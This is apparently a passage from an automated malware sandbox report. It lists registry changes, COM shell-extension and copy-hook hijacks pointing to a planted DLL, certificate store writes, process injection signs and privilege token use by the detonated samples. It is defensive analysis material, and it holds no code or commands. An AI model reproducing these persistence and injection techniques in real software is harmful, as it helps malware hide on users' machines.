description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2751 = "Tomsk Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket ucMKVtG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2891 = "Sudan Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software dwm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" AhjRPOGDGfLEDTGgehsebysf.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" JYQvDsNLyD1BiHmpCiD5dmqQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" JYQvDsNLyD1BiHmpCiD5dmqQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" AhjRPOGDGfLEDTGgehsebysf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates schtasks.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum Ghxyq.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" JYQvDsNLyD1BiHmpCiD5dmqQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" AhjRPOGDGfLEDTGgehsebysf.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-792 = "SA Western Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-631 = "Tokyo Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" AhjRPOGDGfLEDTGgehsebysf.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time" JYQvDsNLyD1BiHmpCiD5dmqQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" AhjRPOGDGfLEDTGgehsebysf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" JYQvDsNLyD1BiHmpCiD5dmqQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-661 = "Cen. Australia Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" AhjRPOGDGfLEDTGgehsebysf.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" JYQvDsNLyD1BiHmpCiD5dmqQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-832 = "SA Eastern Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2591 = "Tocantins Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2001 = "Cabo Verde Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-681 = "E. Australia Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2942 = "Sao Tome Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" JYQvDsNLyD1BiHmpCiD5dmqQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2491 = "Aus Central W. Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe -
Modifies registry class 24 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32 cxcfHffNmhPEQy61bLBMgSz0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F0FC07D-A72F-30E5-FE9F-6274A0D2B0A7} cxcfHffNmhPEQy61bLBMgSz0.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\CLSID\{1F0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32 cxcfHffNmhPEQy61bLBMgSz0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E0FC07D-A72F-30E5-FE9F-6274A0D2B0A7} cxcfHffNmhPEQy61bLBMgSz0.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\CLSID\{2E0FC07D-A72F-30E5-FE9F-6274A0D2B0A7} cxcfHffNmhPEQy61bLBMgSz0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32 cxcfHffNmhPEQy61bLBMgSz0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A0FC07D-A72F-30E5-FE9F-6274A0D2B0A7} cxcfHffNmhPEQy61bLBMgSz0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32\ = "C:\\Windows\\Panther\\UnattendGC\\ShellSysMenu.dll" cxcfHffNmhPEQy61bLBMgSz0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32\ = "C:\\Windows\\Panther\\UnattendGC\\ShellSysMenu.dll" cxcfHffNmhPEQy61bLBMgSz0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\CopyHookHandlers\FileSystemEx cxcfHffNmhPEQy61bLBMgSz0.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\CLSID\{1F0FC07D-A72F-30E5-FE9F-6274A0D2B0A7} cxcfHffNmhPEQy61bLBMgSz0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\ShellEx\{e357fccd-a995-4576-b01f-234630154e96} cxcfHffNmhPEQy61bLBMgSz0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32\ = "C:\\Windows\\Panther\\UnattendGC\\ShellSysMenu.dll" cxcfHffNmhPEQy61bLBMgSz0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ PsLoggedon.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Synaptics.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\CLSID cxcfHffNmhPEQy61bLBMgSz0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32 cxcfHffNmhPEQy61bLBMgSz0.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\CLSID\{2E0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32 cxcfHffNmhPEQy61bLBMgSz0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32\ThreadingModel = "Apartment" cxcfHffNmhPEQy61bLBMgSz0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID cxcfHffNmhPEQy61bLBMgSz0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32\ThreadingModel = "Apartment" cxcfHffNmhPEQy61bLBMgSz0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\{e357fccd-a995-4576-b01f-234630154e96}\ = "{1A0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}" cxcfHffNmhPEQy61bLBMgSz0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32\ThreadingModel = "Apartment" cxcfHffNmhPEQy61bLBMgSz0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\CopyHookHandlers\FileSystemEx\ = "{2E0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}" cxcfHffNmhPEQy61bLBMgSz0.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 qhD0Fjd2sS2bPUQL1AQPs2sm.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e qhD0Fjd2sS2bPUQL1AQPs2sm.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e qhD0Fjd2sS2bPUQL1AQPs2sm.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 688 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1360 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4608 Aztec.exe 4608 Aztec.exe 3412 powershell.exe 3412 powershell.exe 4608 Aztec.exe 4608 Aztec.exe 4608 Aztec.exe 4608 Aztec.exe 4608 Aztec.exe 4608 Aztec.exe 4828 powershell.exe 4828 powershell.exe 4828 powershell.exe 4608 Aztec.exe 4608 Aztec.exe 3116 powershell.exe 3116 powershell.exe 4344 updater.exe 4344 updater.exe 1500 powershell.exe 1500 powershell.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe 3888 Ghxyq.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 3352 Explorer.EXE 1076 aspnet_compiler.exe 724 explorer.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 660 Process not Found 660 Process not Found -
Suspicious behavior: MapViewOfSection 64 IoCs
pid Process 3872 cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe 3508 f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe 4764 schtasks.exe 4764 schtasks.exe 1908 explorer.exe 1908 explorer.exe 1908 explorer.exe 1908 explorer.exe 1908 explorer.exe 1908 explorer.exe 1908 explorer.exe 1908 explorer.exe 1908 explorer.exe 1908 explorer.exe 1908 explorer.exe 1908 explorer.exe 5148 reg.exe 5148 reg.exe 5680 rundll32.EXE 5680 rundll32.EXE 4112 139k3s9mie973k.exe 4112 139k3s9mie973k.exe 1200 139k3s9mie973k.exe 1200 139k3s9mie973k.exe 5956 hueeirv 2664 139k3s9mie973k.exe 2664 139k3s9mie973k.exe 1800 139k3s9mie973k.exe 1800 139k3s9mie973k.exe 3484 139k3s9mie973k.exe 3484 139k3s9mie973k.exe 5216 139k3s9mie973k.exe 5216 139k3s9mie973k.exe 1056 139k3s9mie973k.exe 1056 139k3s9mie973k.exe 5152 139k3s9mie973k.exe 5152 139k3s9mie973k.exe 2500 139k3s9mie973k.exe 2500 139k3s9mie973k.exe 4816 139k3s9mie973k.exe 4816 139k3s9mie973k.exe 920 139k3s9mie973k.exe 920 139k3s9mie973k.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 724 explorer.exe 3396 hueeirv 724 explorer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4544 4363463463464363463463463.exe Token: SeDebugPrivilege 3412 powershell.exe Token: SeDebugPrivilege 4828 powershell.exe Token: SeShutdownPrivilege 2268 powercfg.exe Token: SeCreatePagefilePrivilege 2268 powercfg.exe Token: SeShutdownPrivilege 4548 powercfg.exe Token: SeCreatePagefilePrivilege 4548 powercfg.exe Token: SeShutdownPrivilege 2892 powercfg.exe Token: SeCreatePagefilePrivilege 2892 powercfg.exe Token: SeShutdownPrivilege 2160 powercfg.exe Token: SeCreatePagefilePrivilege 2160 powercfg.exe Token: SeIncreaseQuotaPrivilege 4828 powershell.exe Token: SeSecurityPrivilege 4828 powershell.exe Token: SeTakeOwnershipPrivilege 4828 powershell.exe Token: SeLoadDriverPrivilege 4828 powershell.exe Token: SeSystemProfilePrivilege 4828 powershell.exe Token: SeSystemtimePrivilege 4828 powershell.exe Token: SeProfSingleProcessPrivilege 4828 powershell.exe Token: SeIncBasePriorityPrivilege 4828 powershell.exe Token: SeCreatePagefilePrivilege 4828 powershell.exe Token: SeBackupPrivilege 4828 powershell.exe Token: SeRestorePrivilege 4828 powershell.exe Token: SeShutdownPrivilege 4828 powershell.exe Token: SeDebugPrivilege 4828 powershell.exe Token: SeSystemEnvironmentPrivilege 4828 powershell.exe Token: SeRemoteShutdownPrivilege 4828 powershell.exe Token: SeUndockPrivilege 4828 powershell.exe Token: SeManageVolumePrivilege 4828 powershell.exe Token: 33 4828 powershell.exe Token: 34 4828 powershell.exe Token: 35 4828 powershell.exe Token: 36 4828 powershell.exe Token: SeIncreaseQuotaPrivilege 4828 powershell.exe Token: SeSecurityPrivilege 4828 powershell.exe Token: SeTakeOwnershipPrivilege 4828 powershell.exe Token: SeLoadDriverPrivilege 4828 powershell.exe Token: SeSystemProfilePrivilege 4828 powershell.exe Token: SeSystemtimePrivilege 4828 powershell.exe Token: SeProfSingleProcessPrivilege 4828 powershell.exe Token: SeIncBasePriorityPrivilege 4828 powershell.exe Token: SeCreatePagefilePrivilege 4828 powershell.exe Token: SeBackupPrivilege 4828 powershell.exe Token: SeRestorePrivilege 4828 powershell.exe Token: SeShutdownPrivilege 4828 powershell.exe Token: SeDebugPrivilege 4828 powershell.exe Token: SeSystemEnvironmentPrivilege 4828 powershell.exe Token: SeRemoteShutdownPrivilege 4828 powershell.exe Token: SeUndockPrivilege 4828 powershell.exe Token: SeManageVolumePrivilege 4828 powershell.exe Token: 33 4828 powershell.exe Token: 34 4828 